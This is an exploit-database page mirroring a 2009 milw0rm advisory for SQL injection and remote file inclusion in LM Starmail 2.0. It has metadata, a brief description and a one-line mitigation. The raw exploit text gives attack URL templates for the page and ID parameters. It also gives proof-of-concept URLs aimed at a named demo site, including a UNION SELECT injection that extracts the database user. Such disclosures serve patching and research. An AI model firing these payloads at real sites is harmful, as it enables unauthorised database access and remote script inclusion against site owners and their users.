header-logo
Suggest Exploit
vendor:
LM Starmail
by:
int_main();
7,5
CVSS
HIGH
SQL Injection/File Inclusion Vuln
89
CWE
Product Name: LM Starmail
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:script-shop24:lm_starmail:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

LM Starmail 2.0 (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln

The vulnerability exists in the home.php and paidbanner.php scripts of LM Starmail 2.0. An attacker can inject malicious SQL queries and execute arbitrary remote scripts via the page parameter in the home.php script and the ID parameter in the paidbanner.php script.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

_______         ___________
\   _  \ ___  __\_   _____/
/  /_\  \\  \/  /|    __)  
\  \_/   \>    < |     \   
 \_____  /__/\_ \\___  /   
       \/      \/    \/    
                       #ruling the web since 9/2008


  [=] LM Starmail 2.0  (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln
       
       Vendor   : http://www.script-shop24.de
       Script   : LM Starmail 2.0
       Download : http://www.script-shop24.de/product_info.php/info/p68_Starmail-2-0-Paidmail.html
       Author   : int_main();
       Contact  : someone[at]jabber.ccc.de
       Site     : 0xFEE1DEAD.de
       Greez    : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs,Cod1K
      


       Exploit:

       http://[target]/home.php?page=[evilscript]
       http://[target]/paidbanner.php?ID=[sql]

       POC:

       http://script-demo.eu/Luxusmailer5/home.php?page=http://google.de
       http://script-demo.eu/Luxusmailer5/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--


       (File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.)

       Have phun, wui!

  [=]     

# milw0rm.com [2009-08-06]

Navigation

Suggest Exploit

Services By CQR